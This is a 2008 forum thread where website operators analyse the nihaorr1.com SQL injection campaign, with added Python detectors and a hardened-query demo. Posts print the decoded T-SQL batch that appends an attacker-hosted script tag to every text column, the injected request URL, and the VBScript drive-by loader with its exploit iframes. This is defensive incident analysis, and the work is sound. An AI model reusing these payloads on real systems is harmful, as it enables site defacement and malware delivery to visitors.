
Thread: Anyone know about www.nihaorr1.com/1.js?

Last post 08-26-2008 12:21 AM by silkyfixer. 108 replies.


Page 1 of 8 (109 items)


  • 04-17-2008, 5:35 PM

    Anyone know about www.nihaorr1.com/1.js?

    The db that supports our company's e-commerce is filling up with this URL. We seem to be victims of a SQL injection attack. Is anyone else experiencing this? How are you resolving it? We just happened to see this data... are there other adverse effects on resources other than data?

    Any shared experience would be helpful!

  • 04-18-2008, 5:19 AM In reply to

    • Rovastar
    • Top 10 Contributor
    • Joined on 03-13-2008, 2:00 PM
    • London, UK
    • Posts 594

    Re: Anyone know about www.nihaorr1.com/1.js?

    Not noticed anything.

    Looks dodgy though. I presume you have only just started getting these. Only from 11 Apr?

    That is when the domain nihaorr1.com was registered. IP geolocation shows this machine in Beijing, China.

    What page are they hammering? What do the IIS logs say? Then look at that page. Nearly all hacks now are over HTTP, so it will be the devs' fault for having sloppy code.

    Most overused word in IT is 'should' as in 'That should work!?!'
  • 04-18-2008, 5:34 AM In reply to

    • Rovastar
    • Top 10 Contributor
    • Joined on 03-13-2008, 2:00 PM
    • London, UK
    • Posts 594

    Re: Anyone know about www.nihaorr1.com/1.js?

    Yeah, it is a script bot that spreads a virus; it seems to be very wild atm.

    Googling nihaorr1.com, there are many references to it on sites: http://www.google.co.uk/search?hl=en&q=nihaorr1.com&btnG=Search&meta= (11,000 references at the time)

    Even when I clicked on a link, the virus checker popped up warning me of a virus there. I'll not try again.

    It just seems to affect ASP pages at the moment.

    There were a few recent vulnerabilities with ASP and IIS over the last 6 months, like

    http://www.microsoft.com/technet/security/Bulletin/MS08-006.mspx

    I expect it is exploiting one of those.

    Take care.

    Most overused word in IT is 'should' as in 'That should work!?!'
  • 04-18-2008, 10:25 AM In reply to

    Re: Anyone know about www.nihaorr1.com/1.js?

    We have been hit by this as well. Luckily a backup ran last night, just prior to the attack.

    Our initial investigations are pointing at an attack through IIS using ASP in an overload.

    A whois lookup shows nihaorr1 registered via the Chinese registrar xinnet.com.

    I used the safety of a VM to look under the hood at the operations of the 1.js file.

    It writes several iframes that seem to come up as page not found (Chinese language pack).

    A look at the script is a bit confusing and garbled (of course), but consistent reference is made to "cuteqq" as a variable and variable prefix. It creates an executable; I have yet to determine its intent or impact.

    Googling "cuteqq" pulls up all sorts of pages flagged as harmful. Anyone have any insight on that?


  • 04-18-2008, 1:16 PM In reply to

    Re: Anyone know about www.nihaorr1.com/1.js?

    I also have been hit by this attack, on Saturday 4/12/08. It compromised our database and wrote that script into all of our products. Luckily a database restore fixed the problem. Two days later the same thing happened; I changed all the database and login passwords and did another db restore. Now today, 4/18/08, we got hit again by the same thing, but this time as the pages are loaded ActiveX is activated and wants to run, but of course I did not allow it. Has anybody successfully solved this situation?

  • 04-18-2008, 2:17 PM In reply to

    • rwmorey
    • Not Ranked
    • Joined on 04-28-2003, 9:53 PM
    • Posts 4

    Re: Anyone know about www.nihaorr1.com/1.js?

    Hi --

    We have been hit with this virus/injection as well. We are running Windows 2003 and I believe I have all the security patches on our system.

    Does anyone have any idea how to prevent this from happening again?

    Rich


  • 04-18-2008, 3:17 PM In reply to

    • eftennis
    • Not Ranked
    • Joined on 04-18-2008, 7:12 PM
    • Posts 4

    Re: Anyone know about www.nihaorr1.com/1.js?

    We were hit as well last week by a similar one: aspder.

    Now, last night we were hit by the nihaorr1 attack. Last night's was a little more sophisticated. It inserted script logic into various fields in the database. We ran SQL queries to clean it out since no data was removed.

    It appears to be a SQL injector. But we have not found the exact fix for our ASP scripts to stop it. I managed to find entries in our log files to show the time. The interesting part is that it came from a local connection. This appears to be a virus that hijacks a computer to do its dirty work, since the source is not from China.


  • 04-18-2008, 3:57 PM In reply to

    • bcondrey
    • Not Ranked
    • Joined on 04-18-2008, 7:49 PM
    • Posts 1

    Re: Anyone know about www.nihaorr1.com/1.js?

    Can you let me know what you searched for specifically in your logs? What was the internal PC infected with; did you get a virus name? We had a PC that was infected by a virus called Infostealer, but we aren't sure if the PC caught it from the webserver, or vice versa. Thanks, Barry

  • 04-18-2008, 7:57 PM In reply to

    • davcox
    • Top 50 Contributor
    • Joined on 07-21-2006, 2:28 PM
    • Redmond
    • Posts 113

    Re: Anyone know about www.nihaorr1.com/1.js?

    Yikes, pretty dangerous. A good time to scan your content for this URL and notify the website owners so they can fix their websites and applications, and then fix the form validation logic.

    Looks like someone is doing a lot of script code injection into a lot of vulnerable (read: poorly written) forms that aren't validating input to strip out script code. These sites are then carrying JavaScript code that launches the Remote Data Services Control ActiveX control ... to exploit a few known vulnerabilities ... use WFetch to debug this!!! (You can get WFetch for free in the IIS 6.0 Resource Kit.)

    For example, here is how I looked at this:

    GET http://www.nihaorr1.com:80/1.js HTTP/1.1\r\n
    Host: www.nihaorr1.com\r\n
    Accept: */*\r\n
    \r\n

    HTTP/1.1 200 OK\r\n
    Connection: Keep-Alive\r\n
    Content-Length: 110\r\n
    Via: 1.1 RED-PRXY-29\r\n
    Date: Fri, 18 Apr 2008 23:53:38 GMT\r\n
    Content-Type: application/x-javascript\r\n
    ETag: "30e1873949a1c81:237"\r\n
    Server: Microsoft-IIS/6.0\r\n
    Last-Modified: Fri, 18 Apr 2008 11:42:04 GMT\r\n
    Accept-Ranges: bytes\r\n
    \r\n
    document.writeln("<iframe width=\'10\' height=\'1\' src=\'http:\/\/www.nihaorr1.com\/1.htm\'><\/iframe>");\r\n
    \r\n

    Then I made a second request to the iframe it tries to create:

    GET http://www.nihaorr1.com:80/1.htm HTTP/1.1\r\n
    Host: www.nihaorr1.com\r\n
    Accept: */*\r\n
    \r\n

    HTTP/1.1 200 OK\r\n
    Connection: Keep-Alive\r\n
    Content-Length: 1160\r\n
    Date: Fri, 18 Apr 2008 23:53:51 GMT\r\n
    Content-Type: text/html\r\n
    ETag: "fc6b5a164da1c81:237"\r\n
    Server: Microsoft-IIS/6.0\r\n
    Last-Modified: Fri, 18 Apr 2008 12:09:43 GMT\r\n
    Accept-Ranges: bytes\r\n
    \r\n
    <script language=VBScript>\r\n
    on error resume next\r\n
    Set downf = document.createElement("object")\r\n
    downf.setAttribute "classid", "clsid:BD9"&"6C556-6"&"5A3-11D"&"0-983A-00C"&"04FC2"&"9E36"\r\n
    str="Microsoft.XMLHTTP"\r\n
    Set O = downf.CreateObject(str,"")\r\n
    if Not Err.Number = 0 then\r\n
    err.clear\r\n
    document.write("<iframe width=""10"" height=""10"" src=""http://www.nihaorr1.com/Real.gif""></iframe>") \r\n
    document.write("<iframe width=""5"" height=""5"" src=""http://www.nihaorr1.com/Yahoo.php""></iframe>")\r\n
    document.write("<iframe width=""5"" height=""5"" src=""http://www.nihaorr1.com/cuteqq.htm""></iframe>")  \r\n
    document.write("<iframe width=""5"" height=""5"" src=""http://www.nihaorr1.com/Ms07055.htm""></iframe>")  \r\n
    document.write("<iframe width=""5"" height=""5"" src=""http://www.nihaorr1.com/Ms07033.htm""></iframe>")  \r\n
    document.write("<iframe width=""5"" height=""5"" src=""http://www.nihaorr1.com/Ms07004.htm""></iframe>")\r\n
    else\r\n
    document.write("<iframe width=""0"" height=""0"" src=""http://www.nihaorr1.com/Ajax.htm""></iframe>")\r\n
    document.write("<iframe width=""0"" height=""0"" src=""http://www.nihaorr1.com/Ms06014.htm""></iframe>")\r\n
    end if\r\n
    </script>\r\n
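    The two captures above show the shape of the drive-by: 1.js writes a near-invisible iframe, and 1.htm probes for the Remote Data Services control with a CLSID split into string fragments so that a plain substring scan for the CLSID misses it. The following Python is an added example (not code from the post or from any project) that pulls those indicators out of captured response bodies: it reassembles concatenated classid literals, lists iframes with their dimensions, and flags the ones too small to be visible. The sample bodies are constructed from the responses quoted above, trimmed to the relevant lines; the size threshold and the function names are my own choices. The reassembled value, BD96C556-65A3-11D0-983A-00C04FC29E36, is the CLSID of the RDS.DataSpace control, which matches what the post says the script launches.

```python
import re

# Sample bodies, constructed from the two responses quoted in the post above (1.js, and the
# VBScript inside 1.htm), trimmed to the lines that carry the indicators.
SAMPLE_1JS = r"""document.writeln("<iframe width=\'10\' height=\'1\' src=\'http:\/\/www.nihaorr1.com\/1.htm\'><\/iframe>");"""

SAMPLE_1HTM = r"""<script language=VBScript>
on error resume next
Set downf = document.createElement("object")
downf.setAttribute "classid", "clsid:BD9"&"6C556-6"&"5A3-11D"&"0-983A-00C"&"04FC2"&"9E36"
str="Microsoft.XMLHTTP"
Set O = downf.CreateObject(str,"")
if Not Err.Number = 0 then
document.write("<iframe width=""5"" height=""5"" src=""http://www.nihaorr1.com/cuteqq.htm""></iframe>")
else
document.write("<iframe width=""0"" height=""0"" src=""http://www.nihaorr1.com/Ajax.htm""></iframe>")
end if
</script>"""

# <iframe ... width=.. height=.. src=..>, tolerant of single, double or no quotes
IFRAME_RE = re.compile(
    r"""<iframe[^>]*?width=['"]?(\d+)['"]?[^>]*?height=['"]?(\d+)['"]?[^>]*?src=['"]?([^'"\s>]+)""",
    re.IGNORECASE)
# setAttribute "classid", "..."&"..."&"..."  (VBScript string concatenation)
CLASSID_RE = re.compile(r'"classid"\s*,\s*((?:"[^"]*"\s*&?\s*)+)', re.IGNORECASE)

# Hypothetical threshold: an iframe of at most 100 square pixels is treated as hidden.
TINY_AREA = 100


def normalise(body):
    """Undo the two quoting styles seen in the captures: JavaScript backslash escapes
    (\\/ and \\') and VBScript doubled quotes ("" inside a string literal)."""
    return body.replace("\\/", "/").replace("\\'", "'").replace('""', '"')


def analyse(body):
    """Return iframe targets, hidden iframes and reassembled classid literals found in body."""
    text = normalise(body)
    iframes = [(int(w), int(h), src) for w, h, src in IFRAME_RE.findall(text)]
    tiny = [f for f in iframes if f[0] * f[1] <= TINY_AREA]
    classids = []
    for m in CLASSID_RE.finditer(text):
        fragments = re.findall(r'"([^"]*)"', m.group(1))
        # join the fragments back into the CLSID the browser would actually see
        classids.append(("".join(fragments), len(fragments)))
    return {
        "iframes": iframes,
        "tiny_iframes": tiny,
        "classids": classids,
        # more than one fragment means the CLSID was split to defeat substring matching
        "split_classid": any(n > 1 for _, n in classids),
    }


if __name__ == "__main__":
    for name, body in (("1.js", SAMPLE_1JS), ("1.htm", SAMPLE_1HTM)):
        print(name, analyse(body))
```

    Run against real captures, the interesting output is the list of `tiny_iframes` (every second-stage URL the page pulls in) and the `split_classid` flag, which is a stronger indicator than any single URL because the domain changes between campaigns while the obfuscation trick tends not to.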

  • 04-19-2008, 9:36 AM In reply to

    • asidana
    • Top 200 Contributor
    • Joined on 03-20-2008, 12:02 PM
    • Posts 16

    Re: Anyone know about www.nihaorr1.com/1.js?

    I've been using the regex below:

    ' Whitelist filter: keep letters, digits and "." only; every other character is removed.
    function AlphaNumOnly(MyString)
        Dim sResult, re
        sResult = Trim(MyString)
        Set re = New RegExp
        re.IgnoreCase = True
        re.Global = True
        ' "|" inside a character class is a literal, so the original "[^a-z|A-Z|0-9|\.]"
        ' let "|" through; this class has no separators.
        re.Pattern = "[^a-zA-Z0-9.]"
        sResult = re.Replace(sResult, "")
        AlphaNumOnly = sResult
    end Function

    and got hit; couldn't find anything in my server log about how it's done

  • 04-19-2008, 10:47 AM In reply to

    • rwmorey
    • Not Ranked
    • Joined on 04-28-2003, 9:53 PM
    • Posts 4

    Re: Anyone know about www.nihaorr1.com/1.js?

    I finally found this security notice on Microsoft's website:

    http://www.microsoft.com/technet/security/advisory/951306.mspx I have just made the prescribed changes. Hopefully this will stop this from getting me again.

  • 04-20-2008, 12:06 AM In reply to

    • powlette
    • Not Ranked
    • Joined on 10-16-2002, 10:08 AM
    • Posts 1

    Re: Anyone know about www.nihaorr1.com/1.js?

    Long story short, it's definitely SQL injection. Here's the offending URL:

    orderitem.asp?IT=GM-204;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x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

    Decoding that binary data, which is cast to a varchar, yields this:

    DECLARE @T varchar(255)'@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name'b.name from sysobjects a'syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T'@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar'['+@C+']))+''<script src=nihaorr1.com/1.js></script>''')FETCH NEXT FROM Table_Cursor INTO @T'@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

    And there you have it. It finds all text columns in the database and adds itself to each of them.
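    The reason several people in this thread could not find the attack in their logs is that the batch arrives hex-encoded inside a CAST(0x...) and only becomes readable T-SQL once decoded; NVARCHAR payloads are UTF-16LE, so the hex looks like nothing at all to a plain keyword search. The following Python is an added example (not code from the post or from any project) that percent-decodes an IIS log line, finds every CAST(0x...) literal, decodes it (UTF-16LE when every second byte is zero, single-byte otherwise) and reports the SQL keywords it contains. The log lines are constructed; the hex blob is built by re-encoding an abridged version of the batch quoted above, and the "AS NVARCHAR(4000)" and "EXEC(@S)" tail is my assumption about how the truncated URL continued, not something the post shows. The keyword list and field layout are mine.

```python
import re
from urllib.parse import unquote

# Hex literal handed to CAST(...) in the injected batch, e.g. CAST(0x4400450043...
HEX_LITERAL_RE = re.compile(r"CAST\(\s*0x([0-9A-Fa-f]+)", re.IGNORECASE)
# Tokens that a product-code or id parameter has no business carrying
SUSPICIOUS = ("DECLARE", "EXEC", "CURSOR", "SYSOBJECTS", "SYSCOLUMNS", "UPDATE", "<SCRIPT")


def decode_hex_literal(hex_digits):
    """Decode a T-SQL 0x... literal to text. NVARCHAR payloads are UTF-16LE, which for
    ASCII text means every second byte is 0x00; anything else is read as single-byte."""
    if len(hex_digits) % 2:
        return None  # odd nibble count: not a clean byte string, leave for manual review
    raw = bytes.fromhex(hex_digits)
    if raw and len(raw) % 2 == 0 and not any(raw[1::2]):
        return raw.decode("utf-16-le")
    return raw.decode("latin-1")


def scan_log_line(line):
    """Return a finding for a W3C/IIS log line whose URL carries SQL keywords in the clear
    or inside a hex-encoded CAST literal, or None. IIS stores the URL percent-encoded."""
    url = unquote(line)
    plain_hits = [k for k in SUSPICIOUS if k in url.upper()]
    payloads = []
    for m in HEX_LITERAL_RE.finditer(url):
        text = decode_hex_literal(m.group(1))
        if text is not None:
            payloads.append({"decoded": text,
                             "keywords": [k for k in SUSPICIOUS if k in text.upper()]})
    if not plain_hits and not payloads:
        return None
    return {"plain_keywords": plain_hits, "payloads": payloads}


# Constructed sample: an abridged form of the batch quoted in the post above, re-encoded to
# UTF-16LE hex the way the attacker's NVARCHAR cast carried it.
INJECTED_BATCH = ("DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR "
                  "select a.name,b.name from sysobjects a,syscolumns b ... "
                  "exec('update ['+@T+'] set ['+@C+']=... ''<script src=nihaorr1.com/1.js></script>''')")
HEX = INJECTED_BATCH.encode("utf-16-le").hex().upper()
# Constructed log lines in IIS W3C layout (date time s-ip method uri query port user c-ip ua status ...)
SAMPLE_LOG = ("2008-04-12 03:14:07 10.0.0.5 GET /orderitem.asp "
              "IT=GM-204;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x" + HEX +
              "%20AS%20NVARCHAR(4000));EXEC(@S);-- 80 - 203.0.113.9 Mozilla/4.0 200 0 0")
BENIGN_LOG = ("2008-04-12 03:15:22 10.0.0.5 GET /orderitem.asp IT=GM-204 "
              "80 - 198.51.100.7 Mozilla/4.0 200 0 0")


if __name__ == "__main__":
    for line in (SAMPLE_LOG, BENIGN_LOG):
        print(scan_log_line(line))
```

    The practical value is in `decoded`: once the batch is in the clear you know which tables and columns it touched, which is exactly what the cleanup queries and the restore decision need. The plain-text keyword check is deliberately loose and will misfire on legitimate parameters that happen to contain "update"; treat it as a triage filter, not a verdict.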

  • 04-20-2008, 11:46 AM In reply to

    • rwmorey
    • Not Ranked
    • Joined on 04-28-2003, 9:53 PM
    • Posts 4

    Re: Anyone know about www.nihaorr1.com/1.js?

    Is there a "best practice" for blocking this or similar types of attacks?

  • 04-20-2008, 12:51 PM In reply to

    • eftennis
    • Not Ranked
    • Joined on 04-18-2008, 7:12 PM
    • Posts 4

    Re: Anyone know about www.nihaorr1.com/1.js?

    Thanks. That is the first proof I have seen as to how this works.

    We added a logging function to our SQL calls to try to trap this type of information.

    We have been adding a common script to the top of all of our pages to look for "offending" data in the URL parameters or the form variables. Seems like a never-ending task, though. Doing the rework suggested to stop SQL injectors is not an easy project given the hundreds of pages we have.

    We are continuing to fight this. It is a very "resource-draining" project.

  • 04-20-2008, 12:58 PM In reply to

    • xtal
    • Not Ranked
    • Joined on 04-20-2008, 11:56 AM
    • Posts 1

    Re: Anyone know about www.nihaorr1.com/1.js?

    "Best practice" - lots of them - primarily checking each form processing script to ensure that one cannot simply pass in a long field and/or content which has SQL commands such as "select", "update", etc.

    As you can see from this particular situation, the data may not be readily seen as offending (i.e., the binary encoding). Testing length is therefore pretty important as a rule. If you are expecting to insert a product code into a shopping cart or an email address into a registration table, there is no reason to allow a string longer than the field length to be submitted to the database. One could argue that because of that, you should keep your field lengths to the minimum, etc.

    Minimize the number of dynamic SQL statements.

    Keep in mind that just limiting your form field's "maxlength" property is of little value, as these attacks are not validated by any server-side browser - they are launched via script or program and often at a very rapid pace.

    If your db connection for your site is using "sa" or equivalent, you also have a problem because they can launch extended stored procs. Make sure your db connection is using "user" level privileges only.

    These are some of the bigger items - there is lots on the net on the topic of 'sql injection'.
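    The two fixes above that an ASP page can apply itself, a strict length and character check on the parameter and keeping the value out of the SQL text, are shown side by side below as an added example (not code from the post or from any project). It uses Python and an in-memory SQLite database as a stand-in for the classic-ASP/SQL Server setup in the thread, so the multi-statement batch that SQL Server runs by default is emulated with executescript(); the table, the product id format and the function names are constructed for the demonstration. The least-privilege point (not connecting as "sa") cannot be shown in SQLite and is not covered here.

```python
import re
import sqlite3


def make_db():
    """Constructed stand-in for the products table the posts describe."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE products(id INTEGER PRIMARY KEY, descr TEXT)")
    con.executemany("INSERT INTO products VALUES(?, ?)", [(204, "Widget"), (205, "Gadget")])
    con.commit()
    return con


def lookup_vulnerable(con, raw_id):
    """The pattern under attack: the request value is pasted straight into the SQL text.
    SQL Server runs the whole string as one batch, so a ';' in the input appends statements;
    executescript() gives SQLite the same multi-statement behaviour for this demonstration."""
    sql = "SELECT descr FROM products WHERE id=" + raw_id
    con.executescript(sql)


def lookup_safe(con, raw_id):
    """Hardened form: allowlist the parameter, then bind it instead of concatenating it."""
    # 1. A product id is digits only and bounded in length, so hex blobs and DECLARE/EXEC
    #    text never reach the database regardless of how they are encoded.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        raise ValueError("rejected product id: %r" % raw_id[:40])
    # 2. Parameterised query: the value travels as data, never as SQL text.
    row = con.execute("SELECT descr FROM products WHERE id=?", (int(raw_id),)).fetchone()
    return row[0] if row else None


def descr_of(con, pid):
    return con.execute("SELECT descr FROM products WHERE id=?", (pid,)).fetchone()[0]


# Constructed input shaped like the thread's orderitem.asp?IT=...;DECLARE... request, reduced
# to what SQLite understands: a second statement that appends the script tag to every row.
INJECTED = "204;UPDATE products SET descr=descr||'<script src=nihaorr1.com/1.js></script>';--"


def demo():
    """Run the same input through both lookups and report what each did to the data."""
    con = make_db()
    lookup_vulnerable(con, INJECTED)
    after_attack = descr_of(con, 204)  # every description now carries the script tag
    con2 = make_db()
    try:
        lookup_safe(con2, INJECTED)
        rejected = False
    except ValueError:
        rejected = True
    return {"vulnerable_descr": after_attack, "rejected": rejected,
            "safe_descr": descr_of(con2, 204), "safe_lookup": lookup_safe(con2, "204")}


if __name__ == "__main__":
    print(demo())
```

    Note that the allowlist alone would already have stopped this campaign, since none of the payload survives a digits-only check, but it is the parameter binding that removes the bug: a field that legitimately takes free text cannot be allowlisted this tightly, and only binding keeps such a value from ever being parsed as SQL.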
